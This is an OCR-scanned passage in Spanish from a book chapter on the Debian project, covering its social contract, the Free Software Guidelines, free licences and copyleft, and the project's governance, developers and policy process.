Capi'tulo  1  —  El  proyecto  Debian 


PERSPECTIVA  La  primera  version  del  contrato  social  de  Debian  decia  «Debian  permanece- 
Mas  alia  del  software  software  libre  100  %».  La  desaparicion  de  dicha  palabra  (en  la  ratificacion 
de  la  version  1.1  del  contrato  en  abril  de  2004)  indica  la  voluntad  de  lograr 
libertad  no  solo  en  software  sino  tambien  en  la  documentacion  y  todo  otro 
elemento  que  Debian  desee  proveer  dentro  de  su  sistema  operativo. 

Este  cambio  que  fue  pensado  unicamente  de  forma  editorial  ha  tenido,  en 
realidad,  numerosas  consecuencias,  sobre  todo  con  laeliminacion  de  alguna 
documentacion  problematica.  Ademas,  el  cada  vez  mayor  uso  de  firmware 
en  los  controladores  plantea  problemas:  muchos  no  son  libres  pero  son  ne- 
cesarios  para  el  correcto  funcionamiento  del  hardware  correspondiente. 


2.  Vamos  a  devolverle  a  la  comunidad  de  software  libre. 

Cualquier  mejora  que  el  proyecto  Debian  contribuye  a  un  trabajo  integrado  en  la  distri¬ 
bution  es  enviado  al  autor  de  dicho  trabajo  (el  origen,  llamado  «upstream»  en  ingles).  En 
general,  Debian  cooperara  con  la  comunidad  antes  que  trabajar  aislado. 

COMUNIDAD  El  termino  «autor  original*  hace  referencia  a  el  o  los  autores  o  desarrollado- 
l  Autor  original  o  res  un  Programa>  los  que  1°  escriben  y  lo  han  desarrollado.  Por  otro  lado, 
desarrollador  Debian7  un  <<clesarrollador  Debian*  trabaja  con  un  programa  existente  para  conver- 
tirlo  en  un  paquete  Debian  (el  termino  «responsable»  —  «mantainer»  en 
ingles  —  Debian  es  mas  adecuado). 

En  la  practica,  la  distincion  no  es  tan  clara.  El  responsable  en  Debian  puede 
escribir  un  parche  que  beneficie  a  todos  los  usuarios  de  dicho  trabajo.  En 
general,  Debian  fomenta  a  los  encargados  de  un  paquete  en  Debian  a  que 
se  involucren  tambien  en  el  desarrollo  original  (convirtiendose  entonces  en 
contribuyentes  sin  limitarse  al  rol  de  ser  simples  usuarios  del  programa). 


3.  No  esconderemos  los  problemas. 

Debian  no  es  perfecto  y  nos  enfrentaremos  con  nuevos  problemas  a  solucionar  todos  los 
dias.  En  todo  momento  mantendremos  toda  nuestra  base  de  datos  de  errores  abierta  para 
el  publico.  Los  informes  que  presenten  las  personas  online  se  hara  visible  a  los  demas 
rapidamente. 

4.  Nuestras  prioridades  son  nuestros  usuarios  y  el  software  libre. 

Este  compromiso  es  mas  dificil  de  definir.  Debian  impone,  por  lo  tanto,  una  parcialidad 
al  momento  de  tomar  una  decision  y  descartara  una  solution  sencilla  para  los  desarrolla- 
dores  que  ponga  en  riesgo  la  experiencia  de  los  usuarios,  prefiriendo  una  solution  mas 
elegante  aun  cuando  sea  mas  dificil  de  implementar.  Esto  implica  tomar  en  cuenta,  como 
prioridad,  los  intereses  de  los  usuarios  y  el  software  libre. 

5.  Trabajos  que  no  cumplan  nuestros  estandares  de  software  libre. 

Debian  acepta  y  entiende  que  los  usuarios  pueden  desear  utilizar  programas  no  libres. 
Es  por  eso  que  el  proyecto  permite  el  uso  de  partes  de  su  infraestructura  para  distribuir 
paquetes  Debian  de  software  no  libre  que  puede  ser  redistribuido  de  forma  segura. 
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COMUNIDAD 

lA  favor  o  en  contra  de  la 
seccion  no  libre 
(«non-free»)? 


Frecuentemente,  el  compromiso  de  mantener  una  estructura  para  incluir 
software  no  libre  (es  decir,  la  seccion  «non-free»,  revise  el  recuadro  «Los 
compendios  main,  contrib  y  non-free»  pagina  107)  es  tema  de  debate 
dentro  de  la  comunidad  Debian. 

Los  detractores  argumentan  que  aleja  a  la  gente  de  equivalentes  libres  y  se 
contradice  con  el  principio  de  servir  solo  a  la  causa  de  software  libre.  Los 
defensoressimplemente  dicen  que  la  mayoria  de  los  programas  no  libres  son 
«casi  libres»  ,  limitados  por  solo  una  o  dos  restricciones  molestas  (siendo  la 
prohibicion  de  uso  comercial  del  software  la  mas  comun).  Al  distribuir  estos 
trabajos  como  no  libres,  indirectamente  explicamos  al  autor  que  su  creacion 
seria  mas  conocida  y  utilizada  por  mas  publico  si  pudiera  ser  incluida  en  la 
seccion  general  («main»).  Se  los  invita,  por  lo  tanto,  a  alterar  su  licencia  con 
dicho  proposito. 

La  eliminacion  de  la  seccion  no  libre,  luego  de  un  primer  e  infructuoso  in- 
tento  en  2004  es  improbable  que  reaparezca  en  la  agenda  en  varios  anos, 
especialmente  porque  contiene  muchos  documentos  utiles  que  fueron  mo- 
vidos  simplemente  porque  no  cumplen  los  nuevos  requerimientos  para  la 
seccion  principal.  En  particular,  tal  es  el  caso  de  ciertos  archivos  de  docu- 
mentacion  del  proyecto  GNU  (Emacs  y  Make). 

La  existencia  continua  de  la  seccion  no  libre  es  fuente  esporadica  de  friccio- 
nes  con  la  Fundacion  de  software  libre  («Free  Software  Foundation»)  y  es 
la  principal  causa  por  la  que  se  niega  a  recomendar  oficialmente  a  Debian 
como  sistema  operativo. 


1.2.2.  Las  directrices  de  software  libre  de  Debian 


Este  documento  de  referenda  define  que  software  es  «suficientemente  libre»  para  ser  incluido 
en  Debian.  Si  la  licencia  del  programa  es  acorde  a  dichos  principios,  este  puede  ser  incluido  en 
la  seccion  principal;  caso  contrario,  siempre  que  se  lo  pueda  distribuir  libremente,  se  lo  podra 
encontrar  en  la  seccion  no  libre.  La  seccion  no  libre  no  es  oficialmente  parte  de  Debian,  es  un 
servicio  adicional  provisto  a  los  usuarios. 

Mas  que  un  criterio  de  selection  para  Debian,  este  texto  se  convirtio  en  autoridad  en  materia  de 
software  libre  y  sirvio  como  la  base  para  la  Definition  de  codigo  abierto  («Open  Source  Defini- 
tion»).  Historicamente  es  una  de  las  primeras  definiciones  formales  del  concepto  de  «software 
libre  ». 

La  Licencia  Ptiblica  General  GNU,  la  Licencia  BSD  y  la  Licencia  Artistica  son  ejemplos  de  licencias 
libres  tradicionales  que  son  conformes  a  los  9  puntos  mencionados  en  este  texto.  Abajo  encon- 
trara  el  texto  como  es  publicado  en  el  sitio  web  de  Debian. 

http : //www. debian . org/social_cont ract#guidelines 
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1.  Redistribucion  libre.  La  licencia  de  un  componente  de  Debian  no  puede  restringir  a  un 
tercero  el  vender  o  entregar  el  programa  como  parte  de  una  distribucion  mayor  que  con- 
tiene  programas  de  diferentes  fuentes.  La  licencia  no  debe  solicitar  regalias  u  otras  comi- 
siones  por  dicha  venta. 

VOLVER  A  LOS  CIMIENTOS  La  licencia  GNU  GPL,  la  Licencia  BSD  y  la  Licencia  Artistica  cumplen  las 
Licencias  Iibres  Directrices  de  software  libre  de  Debian,  aun  cuando  son  muy  diferentes 
entre  si. 

La  GNU  GPL,  utilizada  y  promocionada  por  la  FSF  («fundacion  de  software 
I i b re »  por  sus  siglas  en  ingles),  es  la  mas  comun.  Su  principal  particulari- 
dad  es  que  tambien  aplica  a  toda  obra  derivada  que  es  redistribuida:  un 
programa  que  incorpora  o  utiliza  codigo  GPL  solo  puede  ser  distribuido 
segun  sus  terminos.  Prohfbe,  por  lo  tanto,  toda  reutilizacion  en  una  aplica¬ 
cion  privativa.  Esto  supone  serios  problemas  para  la  reutilizacion  de  codigo 
GPL  en  software  libre  que  no  es  compatible  con  esta  licencia.  De  esa  forma, 
es  a  veces  imposible  enlazar  un  programa  publicado  bajo  otra  licencia  de 
software  libre  con  una  biblioteca  distribuida  bajo  la  GPL.  Por  el  otro  lado, 
esta  licencia  es  muy  solida  segun  leyes  norteamericanas:  los  abogados  de  la 
FSF  participaron  en  sus  primeras  revisiones  y  generalmente  forzaron  a  que 
transgesores  llegaran  a  acuerdos  amigables  con  la  FSF  sin  llegar  a  la  corte. 
»•  http : //www. gnu . org/ copy left /gpt . html 

La  licencia  BSD  es  la  menos  restrictiva:  todo  esta  permitido,  inclusive  el 
uso  de  codigo  BSD  modificado  en  una  aplicacion  privativa.  Aun  Microsoft 
la  utiliza,  basando  la  capa  TCP/IP  de  Windows  NT  en  la  del  nucleo  BSD. 

»•  http : //www. open source .org/licenses/bsd- license . php 
Finalmente,  la  licencia  artistica  es  un  compromiso  entre  las  otras  dos:  se 
permite  la  integracion  de  codigo  en  una  aplicacion  privativa,  pero  cualquier 
modificacion  tiene  que  ser  publicada. 

•-  http : //www. open source .org /licenses/artistic- license- 2.0. 
Php 

El  texto  completo  de  estas  licencias  se  encuentra  disponible  en  todos  los 
sistemas  Debian  en  /us  r/share/common  -  licenses/. 

2.  Codigo  fuente.  El  programa  debe  incluir  el  codigo  fuente  completo,  y  debe  permitir  la 
distribucion  en  forma  de  codigo  fuente  y  en  forma  compilada  (binario). 

3.  Trabajos  derivados.  La  licencia  debe  permitir  modificaciones  y  trabajos  derivados  y  debe 
permitir  que  estos  se  distribuyan  bajo  los  mismos  terminos  que  la  licencia  del  programa 
original. 

4.  Integridad  del  codigo  fuente  del  autor.  La  licencia  puede  restringir  la  distribucion  del 
codigo  fuente  en  forma  modificada  solo  si  la  licencia  permite  la  distribucion  de  «parches» 
(«patch  files»)  para  poder  modificar  el  codigo  fuente  original  del  programa  en  el  momento 
de  compilarlo.  La  licencia  debe  permitir  expli'citamente  la  distribucion  de  software  a  partir 
de  codigo  fuente  modificado.  La  licencia  puede  obligar  a  los  trabajos  derivados  a  llevar  un 
nombre  o  numero  de  version  diferentes  del  programa  original  ( Esto  es  un  compromiso.  El 
grupo  de  Debian  anima  a  todos  los  autores  a  no  restringir  ningun  archivo,  fuente  o  compilado,  de 
ser  modificado). 

5.  No  discriminacion  contra  personas  o  grupos.  La  licencia  no  debe  discriminar  a  ninguna 
persona  o  grupo  de  personas. 
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6.  No  discriminacion  en  funcion  de  la  finalidad  perseguida.  La  licencia  no  puede  restrin- 
gir  el  uso  del  programa  para  una  finalidad  determinada.  Por  ejemplo,  no  puede  restringir 
el  uso  del  programa  a  empresas  con  fines  comerciales,  o  en  investigacion  genetica. 


7.  Distribucion  de  la  licencia.  Los  derechos  asociados  al  programa  deben  aplicarse  en  la 
misma  forma  a  todos  aquellos  a  los  que  se  redistribuya  el  programa,  sin  necesidad  de  pedir 
una  licencia  adicional  para  estas  terceras  partes. 


8.  La  licencia  no  debe  ser  especifica  para  Debian.  Los  derechos  asociados  al  programa  no 
deben  depender  de  que  el  programa  sea  parte  o  no  del  sistema  Debian.  Si  el  programa 
es  extraido  de  Debian  y  usado  o  distribuido  sin  Debian,  pero  manteniendo  el  resto  de  las 
condiciones  de  la  licencia,  todos  aquellos  a  los  que  el  programa  se  redistribuya  deben  tener 
los  mismos  derechos  que  los  dados  cuando  forma  parte  de  Debian. 


9.  La  licencia  no  debe  contaminar  a  otros  programas.  La  licencia  no  debe  poner  restric- 
ciones  sobre  otros  programas  que  se  distribuy an  junto  con  el  programa  licenciado.  Por 
ejemplo,  la  licencia  no  puede  insistir  que  todos  los  demas  programas  distribuidos  sobre  el 
mismo  medio  deben  ser  software  libre. 

VOLVER  A  LOS  CIMIENTOS  El  «copyleft»  es  un  principio  que  consiste  en  utilizar  los  derechos  de  autor 
«Copyleft»  («copyright»  en  ingles)  para  garantizar  la  libertad  de  una  obra  y  sus  de- 
rivados,  en  lugar  de  restringir  los  derechos  de  uso,  como  es  el  caso  con  el 
software  privativo.  Es  tambien  un  juego  de  palabras  sobre  el  termino  «copy- 
right»  (por  ser  «right»  y  «left»,  derecha  e  izquierda  respectivamente).  Ri¬ 
chard  Stallman  descubrio  la  idea  cuando  un  amigo  suyo,  aficionado  a  los 
juegos  de  palabras,  escribio  en  un  sobre  dirigido  a  el:  «copyleft:  todos  los 
derechos  invertidos»  («copyleft:  all  rights  reversed*).  El  «copyleft»  impone 
la  preservacion  de  todas  las  libertades  iniciales  sobre  la  distribucion  de  una 
version  original  o  modificada  de  un  programa.  Por  tanto,  no  es  posible  dis- 
tribuir  un  programa  como  software  privativo  si  se  ha  generado  a  partir  del 
codigo  de  un  programa  «copyleft». 

La  familia  de  licencias  copyleft  mas  conocida  es  la  GNU  GPL  y  sus  deriva- 
das,  la  GNU  LGPL  («Licencia  Publica  General  Reducida  GNU»  por  sus  si- 
glas  en  ingles),  y  la  GNU  FDL  («Licencia  Libre  para  Documentacion  GNU» 
por  sus  siglas  en  ingles).  Por  desgracia,  las  licencias  copyleft  son  incompa¬ 
tibles  unas  con  otras  por  lo  que  es  mejor  emplear  solo  una  de  ellas. 
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COMUNIDAD  Bruce  Perens  fue  el  segundo  li'der  del  proyecto  Debian  justo  despues  de  Ian  Mur- 
Bruce  Perens  un  lider  dock.  Fue  muy  polemico  por  sus  metodos  dinamicos  y  autoritarios.  Sin  embargo  su 
polemico  contribucion  a  Debian  ha  sido  muy  importante,  con  quien  Debian  tiene  una  deuda 
especial  por  la  creacion  de  las  famosas  «Directrices  de  software  libre  de  Debian» 
(«DFSG»  por  sus  siglas  en  ingles),  una  idea  original  de  Ean  Schuessler.  Posterior- 
mente,  Bruce  derivaria  de  este  documento  la  famosa  «Definicion  de  codigo  abierto» 
(«Open  Source  Definition*)  eliminando  todas  las  referencias  sobre  Debian. 

>*•  http://www.opensource.org/ 

Su  partida  del  proyecto  fue  bastante  emotiva,  pero  Bruce  ha  permanecido  estre- 
chamente  ligado  a  Debian  ya  que  continua  promoviendo  la  distribucion  en  esferas 
polfticas  y  economicas.  Esporadicamente  aparece  aun  en  las  listas  de  correo  para 
ofrecer  su  consejo  y  presentar  sus  ultimas  inciativas  en  favor  de  Debian. 

Como  ultima  anecdota,  fue  Bruce  el  responsable  de  inspirar  los  diferentes  «nombre 
codigo»  para  las  versiones  de  Debian  (1.1  —  Rex,  1.2  —  Buzz,  1.3  —  Bo,  2.0  —  Hamm, 
2.1  —  Stink,  2.2  —  Potato,  3.0  —  Woody,  3.1  —  Sarge,  4.0  —  Etch,  5.0  —  Lenny,  6.0 
—  Squeeze,  7  —  Wheezy,  8  —  Jessie,  9  (no  liberada  todavia)  —  Stretch,  10  (no  libe- 
rada  todavia)  —  Buster,  Unstable  —  Sid).  Son  tomadas  de  nombres  de  personajes 
de  la  pelicula  «Toy  Story*.  Este  largometraje  animado  completamente  compues- 
to  de  graficos  generados  por  computadora  fue  producido  por  Pixar  Studios,  para 
quien  Bruce  trabajaba  al  momento  de  liderar  el  proyecto  Debian.  El  nombre  « S i d » 
tiene  una  caracteristica  particular  ya  que  estara  siempre  asociada  a  la  rama  inesta- 
ble  Unstable.  En  la  pelicula,  este  personaje  era  el  nino  vecino  que  siempre  rompia 
juguetes  —  por  lo  que  tenga  cuidado  al  acercarse  demasiado  a  Unstable.  Por  otro 
lado,  Sid  es  tambien  acronimo  de  «aun  en  desarrollo*  («Sti 1 1  In  Development*). 


1.3.  El  funcionamiento  interno  del  proyecto  Debian 

El  abuntantes  resultados  producidos  por  el  proyecto  Debian  derivan  simultaneamente  del  tra- 
bajo  de  sus  desarrolladores  experimentados  en  la  infraestructura,  trabajo  individual  o  grupal  de 
desarrolladores  en  paquetes  Debian  y  comentarios  y  sugerencias  de  usuarios. 


1.3.1  Los  desarrolladores  Debian 

Los  desarrolladores  Debian  tienen  varias  responsabilidades  y,  como  miembros  oficiales  del  pro¬ 
yecto,  tienen  una  gran  influencia  en  la  direccion  del  mismo.  Un  desarrollador  Debian  general- 
mente  es  responsable  de  al  menos  un  paquete,  pero  segun  su  tiempo  disponible  y  su  voluntad 
son  libres  de  involucrarse  en  varios  grupos  obteniendo,  asf,  mas  responsabilidades  dentro  del 
proyecto. 

http : //www. debian . org/devel/people 
http : //www. debian . org/int ro/organization 
http : //wiki . debian . org/Teams 
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Debian  posee  una  base  de  datos  que  incluye  a  todos  los  desarrolladores  registrados 
en  el  proyecto  y  su  informacion  relevante  (direccion,  numero  telefonico,  coordena- 
das  geograficas  como  longitud  y  latitud,  etc.).  Parte  de  esa  informacion  (nombre  y 
apellido,  pais,  nombre  de  usuario  dentro  del  proyecto,  nombre  de  usuario  IRC,  Have 
CnuPG,  etc.)  es  publica  y  accesible  en  un  sitio  web. 

http://db.debian.org/ 

Las  coordenadas  geograficas  permiten  la  creacion  de  un  mapa  ubicando  a  todos 
los  desarrolladores  alrededor  del  mundo.  Debian  es  realmente  un  proyecto  inter- 
nacional:  se  pueden  encontrar  desarrolladores  en  todos  los  continentes,  aunque  la 
mayoria  estan  en  el  hemisferio  Oeste. 


Figura  1.1  Distribution  mundial  de  l os  desarrolladores  Debian 


HERRAMIENTA 

Base  de  datos  de 
desarrolladores 


La  manutencion  de  paquetes  es  una  actividad  relativamente  organizada,  muy  documentada  o 
inclusive  reglamentada.  Debe,  de  hecho,  adherirse  a  todos  los  estandares  establecidos  por  la  Nor- 
mativa  Debian  («Debian  Policy»).  Afortunadamente,  existen  muchas  herramientas  que  facilitan 
el  trabajo  de  los  desarrolladores.  Elios  pueden,  entonces,  concentrarse  en  las  particularidades 
de  su  paquete  y  en  tareas  mas  complejas  como  la  correccion  de  errores. 

+■  http : //www. debian . org/doc/debian- policy/ 


Capi'tulo  1  —  El  proyecto  Debian 


11 


VOLVER  A  LOS  CIMIENTOS 

Manutencion  de 
paquetes,  el  trabajo  de  un 
desarrollador 


La  manutencion  de  un  paquete  implica,  primero,  «empaquetar»  un  programa.  Es- 
pecfficamente,  significa  definir  [os  medios  de  instalacion  para  que,  una  vez  insta- 
lado,  este  programa  opere  y  cumpla  las  reglas  que  el  proyecto  Debian  define  para 
si  mismo.  El  resultado  de  esta  operacion  es  guardado  en  un  archivo  .deb.  La  ins¬ 
talacion  efectiva  de  este  paquete  solo  necesitara  la  extraccion  de  los  contenidos 
de  este  archivo  comprimido  y  la  ejecucion  de  algunos  scripts  de  preinstalacion  y 
postinstalacion  que  contiene. 


Luego  de  esta  fase  inicial,  el  ciclo  de  manutencion  comienza  realmente:  la  prepa- 
racion  de  actualizaciones  para  seguir  la  ultima  version  de  la  Normativa  Debian, 
corregir  errores  reportados  por  usuarios  e  incluir  una  nueva  version  del  programa 
original  que,  naturalmente,  continua  su  desarrollo  de  forma  simultanea.  Por  ejem- 
plo,  al  momento  del  empaquetado  original  el  programa  estaba  en  su  version  1.2.3. 
Luego  de  algunos  meses  de  desarrollo  los  autores  originales  publican  una  nueva 
version  estable  numerada  1.4.0.  En  este  momento,  el  desarrollador  Debian  debe- 
ria  actualizar  el  paquete  para  que  los  usuarios  puedan  beneficiarse  de  esta  ultima 
version  estable. 


La  Normativa  («Policy»)  es  un  elemento  esencial  del  proyecto  Debian,  establece  las  normas  que 
garantizan  tanto  la  calidad  de  los  paquetes  como  tambien  la  interoperabilidad  perfecta  de  la 
distribucion.  Gracias  a  este  documento,  Debian  se  mantiene  consistente  a  pesar  de  su  gigantes- 
co  tamano.  La  Normativa  no  esta  escrita  en  piedra  sino  que  evoluciona  continuamente  gracias 
a  propuestas  formuladas  en  la  lista  de  correo  debian-policy@lists.debian.org.  Las  modificacio- 
nes  acordadas  por  todas  las  partes  interesadas  son  aceptadas  y  aplicadas  al  texto  por  un  grupo 
reducido  de  desarrolladores  que  no  tienen  responsabilidad  editorial  (solo  incluyen  las  modifica- 
ciones  aceptadas  por  los  desarrolladores  Debian  que  son  miembros  de  la  lista  antes  mencionada). 
Puede  leer  las  correcciones  propuestas  siendo  discutidas  en  el  sistema  de  seguimiento  de  erro¬ 
res: 

http : //bugs .debian . org/debian- policy 


NORMA  DEBIAN  La  documentacion  de  cada  paquete  es  almacenada  en  /usr/share/ 
La  documentacion  doc  /paquete/.  Este  directorio  generalmente  contiene  un  archivo  README  .  Debian 
que  describe  las  modificaciones  especificas  a  Debian  que  hizo  el  encargado  del 
paquete.  Es,  por  lo  tanto,  aconsejable  leer  este  archivo  antes  de  realizar  cualquier 
configuracion  para  poder  aprovechar  su  experiencia.  Tambien  encontrara  un 
archivo  changelog .  Debian .  gz  que  describe  los  cambios  de  una  version  a  otra 
realizados  por  el  responsable  del  paquete.  Este  no  tiene  que  confundirse  con  el 
archivo  changelog. gz  (o  equivalente)  que  describe  los  cambios  realizados  por 
los  desarrolladores  originales.  El  archivo  copyright  incluye  informacion  sobre 
los  autores  y  la  licencia  que  abarca  al  software.  Finalmente,  tambien  podrla 
encontrar  un  archivo  de  nombre  NEWS .  Debian .  gz,  que  permite  al  desarrollador 
Debian  comunicar  informacion  importante  sobre  actualizaciones;  si  instala 
apt-listchanges,  se  mostraran  estos  mensajes  automaticamente.  Todos  los 
otros  archivos  son  especificos  del  software  en  cuestion.  Querrlamos  mencionar 
especialmente  el  directorio  examples  que  generalmente  contiene  ejemplos  de 
archivos  de  configuracion. 
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COMUNIDAD  Cualquiera  puede  proponer  una  correccion  a  la  Normativa  Debian  simplemente 
Proceso  editorial  de  la  enviando  un  reporte  de  error  con  gravedad  «wishlist»  (un  deseo)  sobre  el  paque- 
normativa  te  debian-poticy.  El  proceso  que  comienza  en  ese  momento  esta  documentado  en 
/usr/share/doc/debian  -  policy/ Process .  html:  si  es  aceptado  que  el  problema 
revelado  tiene  que  ser  resuelto  creando  una  nueva  regia  en  la  Normativa  Debian, 
comienza  una  discusion  sobre  la  misma  en  la  lista  de  correo  debian-policy@lists. 
debian.org  hasta  llegar  a  un  consenso  y  se  llega  a  una  propuesta.  Alguien  creara 
una  version  preliminar  de  las  modificaciones  deseadas  y  las  envia  para  ser  apro- 
badas  (en  forma  de  un  parche  para  revision).  Tan  pronto  como  otros  dos  desarro- 
lladores  confirmen  («secundan»  la  propuesta)  que  los  cambios  propuestos  reflejan 
el  consenso  al  que  se  llego  en  la  discusion  previa,  la  propuesta  puede  ser  incluida 
en  el  documento  oficial  por  uno  de  los  encargados  del  paquete  debian-policy.  Si 
el  proceso  falla  en  alguno  de  sus  pasos,  los  desarrolladores  cerraran  el  reporte  de 
error  clasificando  la  propuesta  como  rechazada. 


La  Normativa  cubre  en  detalle  los  aspectos  tecnicos  de  la  creacion  de  paquetes.  El  tamano  del 
proyecto  tambien  genera  problemas  de  organization;  estos  son  tratados  por  la  Constitution  De¬ 
bian  («Debian  Constitution))),  que  establece  una  estructura  y  los  medios  para  tomar  decisiones. 
En  otras  palabras:  un  sistema  formal  de  gobierno. 

Esta  constitucion  define  cierta  cantidad  de  roles  y  posiciones  ademas  de  las  responsabilidades  y 
atribuciones  de  cada  uno.  Es  particularmente  importante  notar  que  los  desarrolladores  Debian 
siempre  tienen  la  autoridad  maxima  en  cuanto  a  decisiones  mediante  sus  votos  a  resoluciones 
generales,  en  ellas  se  necesita  una  mayoria  calificada  de  tres  cuartos  (75  %)  de  los  votos  para 
realizar  modificaciones  significativas  (como  aquellas  que  tendran  impacto  en  los  documentos 
fundacionales).  Sin  embargo,  los  desarrolladores  eligen  un  «Hder»  cada  ano  para  representarlos 
en  reuniones  y  asegurar  la  coordinacion  interna  entre  varios  equipos.  Esta  eleccion  es  siempre 
un  periodo  de  discusiones  intensas.  El  rol  del  lider  no  esta  formalmente  definido  en  ningun 
documento:  los  candidatos  al  puesto  generalmente  ofrecen  su  propia  definicion  para  el  mismo. 
En  la  practica,  el  rol  de  lider  incluye  ser  representante  frente  a  los  medios,  coordinar  equipos 
«internos»  y  dar  una  gufa  general  al  proyecto  con  la  que  los  desarrolladores  empaticen:  la  vision 
del  lider  («DPL»  por  sus  siglas  en  ingles)  son  aprobadas  implicitamente  por  la  mayoria  de  los 
miembros  del  proyecto. 

Especificamente,  el  lider  realmente  tiene  autoridad:  sus  votos  deciden  votaciones  empatadas, 
pueden  tomar  decisiones  sobre  aquello  que  no  este  a  cargo  de  alguien  mas  y  pueden  delegar 
parte  de  sus  responsabilidades. 

Desde  su  creacion,  el  proyecto  fue  liderado  sucesivamente  por  Ian  Murdock,  Bruce  Perens,  Ian 
Jackson,  Wichert  Akkerman,  Ben  Collins,  Bdale  Garbee,  Martin  Michlmayr,  Branden  Robinson, 
Anthony  Towns,  Sam  Hocevar,  Steve  McIntyre,  Stefano  Zacchiroli  y  Lucas  Nussbaum. 

La  constitucion  tambien  define  un  «comite  tecnico».  El  rol  esencial  de  este  comite  es  tomar  de¬ 
cisiones  en  asuntos  tecnicos  cuando  los  desarrolladores  involucrados  no  llegaron  a  un  acuerdo 
entre  ellos.  De  lo  contrario,  el  comite  tiene  un  rol  de  consejero  para  cualquier  desarrollador  que 
no  tome  una  decision  en  una  cuestion  de  la  que  son  responsables.  Es  importante  notar  que  el 
comite  solo  se  involucra  cuando  alguna  de  las  partes  asi  lo  solicita. 
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Por  ultimo,  la  constitucion  define  la  posicion  de  «secretario  del  proyecto»  quien  esta  a  cargo  de 
organizar  las  votaciones  relacionadas  a  las  varias  elecciones  y  resoluciones  generales. 

El  proceso  de  una  «resolucion  general))  esta  completamente  detallado  en  la  constitucion,  desde 
el  periodo  inicial  de  discusion  hasta  el  recuento  final  de  votos.  Para  mas  detalles  revise: 

http : //www. debian . org/devel/ constitution .en . html 


CULTURA  Un  «flamewar»  es  una  discusion  demasiado  apasionada  que  frecuentemente  con- 
La  discusion  en  llamas'  cluye  con  los  involucrados  atacandose  entre  ellos  una  vez  que  se  agotaron  todos 
«flamewar»  l°s  argumer|tos  razonables  en  ambos  lados.  Generalmente  algunos  temas  son  mas 
propensos  a  generar  polemicas  que  otros  (la  eleccion  del  editor  de  texto:  «^prefiere 
vi  o  emacs?»,  es  un  favorito).  Estos  frecuentemente  provocan  un  intercambio  muy 
rapido  de  correos  debido  al  gran  numero  de  personas  con  una  opinion  en  el  asunto 
(todos)  y  la  naturaleza  subjetiva  de  estas  preguntas. 

Generalmente  nada  particularmente  util  sale  de  esas  discusiones;  la  recomendacion 
general  es  mantenerse  alejado  de  estos  debates  y  tal  vez  leer  rapidamente  entre 
lineas  el  contenido  ya  que  leerlo  todo  tomaria  demasiado  tiempo. 


Aun  cuando  la  constitucion  establece  una  democracia  aparente,  la  realidad  diaria  es  muy  diferen- 
te:  Debian  sigue  naturalmente  las  reglas  de  una  «do-ocracia»  (el  gobierno  de  los  que  hacen)  en 
el  software  libre:  es  aquel  que  hace  las  cosas  el  que  decide  como  hacerlas.  Se  puede  desperdiciar 
mucho  tiempo  discutiendo  los  meritos  respectivos  de  varias  formas  de  abordar  un  problema; 
la  solucion  elegida  sera  la  primera  que  sea  tanto  funcional  como  satisfactoria...  que  saldra  del 
tiempo  que  una  persona  competente  invirtio  en  ella. 

Esta  es  la  tinica  forma  en  que  ganara  sus  insignias:  haga  algo  util  y  muestre  que  ha  trabajado 
bien.  Muchos  equipos  «administrativos»  en  Debian  funcionan  por  cooptacion,  prefiriendo  vo¬ 
luntaries  que  ya  han  realizado  contribuciones  palpables  y  demostrado  ser  competentes.  La  na¬ 
turaleza  ptiblica  del  trabajo  de  estos  equipos  hace  posible  que  nuevos  colaboradores  la  observen 
y  empiecen  a  ayudar  sin  ningtin  privilegio  especial.  Esta  es  la  razon  por  la  que  Debian  es  normal- 
mente  descripto  como  una  «meritocracia». 


CULTURA  Meritocracia  es  una  forma  de  gobierno  en  el  que  la  autoridad  es  ejercida  por  aque- 

Meritocracia  el  triunfo  ^os  con  mayor  merito.  Para  Debian,  el  merito  es  una  medida  de  competencia  que  es, 

del  conocimiento  a  su  vez>  evaluada  por  uno  o  mas  terceros  dentro  del  proyecto  observando  acciones 
pasadas  (Stefano  Zacchiroli,  un  ex  lider  del  proyecto,  habla  de  una  «do-ocracy»: 
el  poder  de  aquellos  que  hacen  las  cosas).  La  simple  existencia  de  dichas  acciones 
demuestra  cierto  nivel  de  competencia;  sus  logros  generalmente  siendo  software 
libre  con  el  codigo  fuente  disponible  que  puede  ser  facilmente  revisado  por  pares 
para  evaluar  su  calidad. 


Este  metodo  de  operaciones  es  efectivo  y  garantiza  la  calidad  de  los  contribuyentes  en  los  equi¬ 
pos  «clave»  de  Debian.  Este  metodo  dista  de  ser  perfectoy  ocasionalmente  algunos  no  lo  aceptan. 
La  seleccion  de  desarrolladores  aceptados  en  los  grupos  puede  parecer  arbitraria  o  incluso  in- 
justa.  Lo  que  es  mas,  no  todos  tienen  la  misma  definicion  de  los  servicios  esperados  de  estos 
equipos.  Para  algunos  es  inaceptable  tener  que  esperar  ocho  dlas  para  la  inclusion  de  un  nuevo 
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paquete  en  Debian,  mientras  que  otros  esperaran  pacientemente  por  tres  semanas  sin  proble- 
mas.  Por  ello,  regularmente  hay  quejas  sobre  la  «calidad  de  servicio»  de  algunos  equipos  por 
aquellos  que  estan  descontentos. 


COMUNIDAD  El  equipo  a  cargo  de  aceptar  nuevos  desarrolladores  es  el  criticado  con  mas  frecuen- 
Integracion  de  nuevos  cla ■  ^no  ^ebe  reconocer  que,  a  lo  largo  de  los  anos,  el  proyecto  Debian  se  ha  vuelto 

desarrolladores  m^s  Y  m^s  ex'ger|te  con  los  desarrolladores  que  aceptara.  Algunos  ven  esto  como 
una  injusticia  y  debemos  confesar  que  lo  que  eran  pequenos  retos  al  principio  han 
crecido  en  gran  medida  en  una  comunidad  de  mas  de  1000  personas  cuando  se 
trata  de  asegurar  la  calidad  e  integridad  de  todo  lo  que  Debian  produce  para  sus 
usuarios. 

Por  otra  parte,  el  procedimiento  de  aceptacion  concluye  con  la  revision  de  la  can- 
didatura  por  parte  de  un  pequeno  equipo:  los  «administradores  de  las  cuentas  de 
Debian»  («DAM»  por  sus  siglas  en  ingles).  Por  lo  tanto,  estos  administradores  se 
encuentran  muy  expuestos  a  criticas  ya  que  tienen  la  ultima  palabra  en  cuanto  a  la 
aceptacion  o  rechazo  del  ingreso  de  un  voluntario  a  la  comunidad  de  desarrollado¬ 
res  de  Debian.  En  la  practica,  a  veces  deben  retrasar  la  aceptacion  de  una  persona 
hasta  que  conocen  mas  acerca  del  funcionamiento  del  proyecto.  Por  supuesto  que 
cualquiera  puede  contribuir  a  Debian  antes  de  ser  aceptado  como  desarrollador 
oficial  al  ser  respaldado  por  los  desarroladores  actuales. 


1.3.2  El  papel  activo  de  los  usuarios 

